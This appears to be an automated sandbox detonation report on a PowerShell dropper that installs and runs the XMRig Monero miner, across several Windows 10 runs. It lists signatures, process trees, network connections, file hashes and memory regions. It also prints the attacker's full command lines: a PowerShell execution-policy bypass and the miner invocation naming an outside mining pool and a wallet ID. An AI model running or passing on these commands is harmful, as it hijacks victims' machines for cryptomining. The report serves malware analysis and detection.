| Description | Indicator | Process | Target |
| PID 4144 wrote to memory of 4924 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4144 wrote to memory of 4924 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
Files
memory/4144-0-0x00007FFC3E0D3000-0x00007FFC3E0D5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xa1uunpq.wom.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4144-6-0x00000210BEE10000-0x00000210BEE32000-memory.dmp
memory/4144-10-0x00007FFC3E0D0000-0x00007FFC3EB92000-memory.dmp
memory/4144-11-0x00007FFC3E0D0000-0x00007FFC3EB92000-memory.dmp
memory/4144-12-0x00007FFC3E0D0000-0x00007FFC3EB92000-memory.dmp
memory/4144-13-0x00007FFC3E0D3000-0x00007FFC3E0D5000-memory.dmp
memory/4144-14-0x00007FFC3E0D0000-0x00007FFC3EB92000-memory.dmp
memory/4144-15-0x00007FFC3E0D0000-0x00007FFC3EB92000-memory.dmp
memory/4144-16-0x00007FFC3E0D0000-0x00007FFC3EB92000-memory.dmp
memory/4144-19-0x00000210BEEC0000-0x00000210BEECA000-memory.dmp
memory/4144-18-0x00000210BF330000-0x00000210BF342000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4924-50-0x00000286BE7D0000-0x00000286BE7F0000-memory.dmp
memory/4924-51-0x00000286BE810000-0x00000286BE830000-memory.dmp
memory/4924-52-0x00007FF6DB630000-0x00007FF6DC263000-memory.dmp
memory/4924-55-0x00000286BE830000-0x00000286BE850000-memory.dmp
memory/4924-54-0x00000286BE850000-0x00000286BE870000-memory.dmp
memory/4924-53-0x00007FF6DB630000-0x00007FF6DC263000-memory.dmp
memory/4924-56-0x00007FF6DB630000-0x00007FF6DC263000-memory.dmp
memory/4924-57-0x00007FF6DB630000-0x00007FF6DC263000-memory.dmp
memory/4924-59-0x00000286BE830000-0x00000286BE850000-memory.dmp
memory/4924-58-0x00000286BE850000-0x00000286BE870000-memory.dmp
memory/4924-60-0x00007FF6DB630000-0x00007FF6DC263000-memory.dmp
memory/4924-61-0x00007FF6DB630000-0x00007FF6DC263000-memory.dmp
memory/4924-62-0x00007FF6DB630000-0x00007FF6DC263000-memory.dmp
memory/4924-63-0x00007FF6DB630000-0x00007FF6DC263000-memory.dmp
memory/4924-64-0x00007FF6DB630000-0x00007FF6DC263000-memory.dmp
memory/4924-65-0x00007FF6DB630000-0x00007FF6DC263000-memory.dmp
memory/4924-66-0x00007FF6DB630000-0x00007FF6DC263000-memory.dmp
memory/4924-67-0x00007FF6DB630000-0x00007FF6DC263000-memory.dmp
memory/4924-68-0x00007FF6DB630000-0x00007FF6DC263000-memory.dmp
memory/4924-69-0x00007FF6DB630000-0x00007FF6DC263000-memory.dmp
memory/4924-70-0x00007FF6DB630000-0x00007FF6DC263000-memory.dmp
memory/4924-71-0x00007FF6DB630000-0x00007FF6DC263000-memory.dmp
memory/4924-72-0x00007FF6DB630000-0x00007FF6DC263000-memory.dmp
memory/4924-73-0x00007FF6DB630000-0x00007FF6DC263000-memory.dmp
memory/4924-74-0x00007FF6DB630000-0x00007FF6DC263000-memory.dmp
memory/4924-75-0x00007FF6DB630000-0x00007FF6DC263000-memory.dmp
memory/4924-76-0x00007FF6DB630000-0x00007FF6DC263000-memory.dmp
memory/4924-77-0x00007FF6DB630000-0x00007FF6DC263000-memory.dmp
memory/4924-78-0x00007FF6DB630000-0x00007FF6DC263000-memory.dmp
memory/4924-79-0x00007FF6DB630000-0x00007FF6DC263000-memory.dmp
memory/4924-80-0x00007FF6DB630000-0x00007FF6DC263000-memory.dmp
memory/4924-81-0x00007FF6DB630000-0x00007FF6DC263000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2024-05-22 20:12
Reported
2024-05-22 20:18
Platform
win10-20240404-en
Max time kernel
291s
Max time network
304s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4424 wrote to memory of 4240 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4424 wrote to memory of 4240 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.162.46.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
Files
memory/4424-3-0x00007FFF7A123000-0x00007FFF7A124000-memory.dmp
memory/4424-5-0x000001766E030000-0x000001766E052000-memory.dmp
memory/4424-9-0x000001766E1E0000-0x000001766E256000-memory.dmp
memory/4424-8-0x00007FFF7A120000-0x00007FFF7AB0C000-memory.dmp
memory/4424-18-0x00007FFF7A120000-0x00007FFF7AB0C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tje052eb.j50.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4424-26-0x00007FFF7A120000-0x00007FFF7AB0C000-memory.dmp
memory/4424-30-0x00007FFF7A123000-0x00007FFF7A124000-memory.dmp
memory/4424-31-0x00007FFF7A120000-0x00007FFF7AB0C000-memory.dmp
memory/4424-32-0x00007FFF7A120000-0x00007FFF7AB0C000-memory.dmp
memory/4424-65-0x000001766E1B0000-0x000001766E1BA000-memory.dmp
memory/4424-52-0x000001766E1C0000-0x000001766E1D2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4240-94-0x000001B98C9C0000-0x000001B98C9E0000-memory.dmp
memory/4240-95-0x00007FF7538E0000-0x00007FF754513000-memory.dmp
memory/4240-96-0x00007FF7538E0000-0x00007FF754513000-memory.dmp
memory/4240-97-0x00007FF7538E0000-0x00007FF754513000-memory.dmp
memory/4240-98-0x00007FF7538E0000-0x00007FF754513000-memory.dmp
memory/4240-99-0x00007FF7538E0000-0x00007FF754513000-memory.dmp
memory/4240-100-0x00007FF7538E0000-0x00007FF754513000-memory.dmp
memory/4240-101-0x00007FF7538E0000-0x00007FF754513000-memory.dmp
memory/4240-102-0x00007FF7538E0000-0x00007FF754513000-memory.dmp
memory/4240-103-0x00007FF7538E0000-0x00007FF754513000-memory.dmp
memory/4240-104-0x00007FF7538E0000-0x00007FF754513000-memory.dmp
memory/4240-105-0x00007FF7538E0000-0x00007FF754513000-memory.dmp
memory/4240-106-0x00007FF7538E0000-0x00007FF754513000-memory.dmp
memory/4240-107-0x00007FF7538E0000-0x00007FF754513000-memory.dmp
memory/4240-108-0x00007FF7538E0000-0x00007FF754513000-memory.dmp
memory/4240-109-0x00007FF7538E0000-0x00007FF754513000-memory.dmp
memory/4240-110-0x00007FF7538E0000-0x00007FF754513000-memory.dmp
memory/4240-111-0x00007FF7538E0000-0x00007FF754513000-memory.dmp
memory/4240-112-0x00007FF7538E0000-0x00007FF754513000-memory.dmp
memory/4240-113-0x00007FF7538E0000-0x00007FF754513000-memory.dmp
memory/4240-114-0x00007FF7538E0000-0x00007FF754513000-memory.dmp
memory/4240-115-0x00007FF7538E0000-0x00007FF754513000-memory.dmp
memory/4240-116-0x00007FF7538E0000-0x00007FF754513000-memory.dmp
memory/4240-117-0x00007FF7538E0000-0x00007FF754513000-memory.dmp
memory/4240-118-0x00007FF7538E0000-0x00007FF754513000-memory.dmp
memory/4240-119-0x00007FF7538E0000-0x00007FF754513000-memory.dmp
Analysis: behavioral15
Detonation Overview
Submitted
2024-05-22 20:12
Reported
2024-05-22 20:18
Platform
win10v2004-20240508-en
Max time kernel
300s
Max time network
305s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3452 wrote to memory of 4060 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3452 wrote to memory of 4060 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| NL | 23.62.61.59:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 59.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.58.20.217.in-addr.arpa | udp |
Files
memory/3452-0-0x00007FFEF8BF3000-0x00007FFEF8BF5000-memory.dmp
memory/3452-1-0x0000020C1DD20000-0x0000020C1DD42000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zehadbiy.zja.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3452-11-0x00007FFEF8BF0000-0x00007FFEF96B1000-memory.dmp
memory/3452-12-0x00007FFEF8BF0000-0x00007FFEF96B1000-memory.dmp
memory/3452-13-0x00007FFEF8BF3000-0x00007FFEF8BF5000-memory.dmp
memory/3452-14-0x00007FFEF8BF0000-0x00007FFEF96B1000-memory.dmp
memory/3452-15-0x00007FFEF8BF0000-0x00007FFEF96B1000-memory.dmp
memory/3452-17-0x00007FFEF8BF0000-0x00007FFEF96B1000-memory.dmp
memory/3452-18-0x0000020C36EF0000-0x0000020C36F02000-memory.dmp
memory/3452-19-0x0000020C36ED0000-0x0000020C36EDA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4060-50-0x000001FF8D360000-0x000001FF8D380000-memory.dmp
memory/4060-51-0x000001FF8D3B0000-0x000001FF8D3D0000-memory.dmp
memory/4060-52-0x00007FF633A80000-0x00007FF6346B3000-memory.dmp
memory/4060-53-0x00007FF633A80000-0x00007FF6346B3000-memory.dmp
memory/4060-54-0x000001FF8D3D0000-0x000001FF8D3F0000-memory.dmp
memory/4060-55-0x000001FF8D3F0000-0x000001FF8D410000-memory.dmp
memory/4060-56-0x00007FF633A80000-0x00007FF6346B3000-memory.dmp
memory/3452-57-0x00007FFEF8BF0000-0x00007FFEF96B1000-memory.dmp
memory/4060-58-0x00007FF633A80000-0x00007FF6346B3000-memory.dmp
memory/4060-59-0x000001FF8D3D0000-0x000001FF8D3F0000-memory.dmp
memory/4060-60-0x000001FF8D3F0000-0x000001FF8D410000-memory.dmp
memory/4060-61-0x00007FF633A80000-0x00007FF6346B3000-memory.dmp
memory/4060-62-0x00007FF633A80000-0x00007FF6346B3000-memory.dmp
memory/4060-63-0x00007FF633A80000-0x00007FF6346B3000-memory.dmp
memory/4060-64-0x00007FF633A80000-0x00007FF6346B3000-memory.dmp
memory/4060-65-0x00007FF633A80000-0x00007FF6346B3000-memory.dmp
memory/4060-66-0x00007FF633A80000-0x00007FF6346B3000-memory.dmp
memory/4060-67-0x00007FF633A80000-0x00007FF6346B3000-memory.dmp
memory/4060-68-0x00007FF633A80000-0x00007FF6346B3000-memory.dmp
memory/4060-69-0x00007FF633A80000-0x00007FF6346B3000-memory.dmp
memory/4060-70-0x00007FF633A80000-0x00007FF6346B3000-memory.dmp
memory/4060-71-0x00007FF633A80000-0x00007FF6346B3000-memory.dmp
memory/4060-72-0x00007FF633A80000-0x00007FF6346B3000-memory.dmp
memory/4060-73-0x00007FF633A80000-0x00007FF6346B3000-memory.dmp
memory/4060-74-0x00007FF633A80000-0x00007FF6346B3000-memory.dmp
memory/4060-75-0x00007FF633A80000-0x00007FF6346B3000-memory.dmp
memory/4060-76-0x00007FF633A80000-0x00007FF6346B3000-memory.dmp
memory/4060-77-0x00007FF633A80000-0x00007FF6346B3000-memory.dmp
memory/4060-78-0x00007FF633A80000-0x00007FF6346B3000-memory.dmp
memory/4060-79-0x00007FF633A80000-0x00007FF6346B3000-memory.dmp
memory/4060-80-0x00007FF633A80000-0x00007FF6346B3000-memory.dmp
memory/4060-81-0x00007FF633A80000-0x00007FF6346B3000-memory.dmp
memory/4060-82-0x00007FF633A80000-0x00007FF6346B3000-memory.dmp
Analysis: behavioral30
Detonation Overview
Submitted
2024-05-22 20:12
Reported
2024-05-22 20:18
Platform
win10-20240404-en
Max time kernel
290s
Max time network
295s
Command Line
Signatures
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1844 wrote to memory of 3916 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1844 wrote to memory of 3916 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 52.111.229.48:443 | tcp | |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.117.168.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.197.17.2.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | tcp | |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.94.73.104.in-addr.arpa | udp |
Files
memory/1844-2-0x00007FF831843000-0x00007FF831844000-memory.dmp
memory/1844-6-0x000002D07A720000-0x000002D07A742000-memory.dmp
memory/1844-9-0x00007FF831840000-0x00007FF83222C000-memory.dmp
memory/1844-10-0x000002D07B330000-0x000002D07B3A6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cvtsetc3.b2x.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/1844-11-0x00007FF831840000-0x00007FF83222C000-memory.dmp
memory/1844-27-0x00007FF831840000-0x00007FF83222C000-memory.dmp
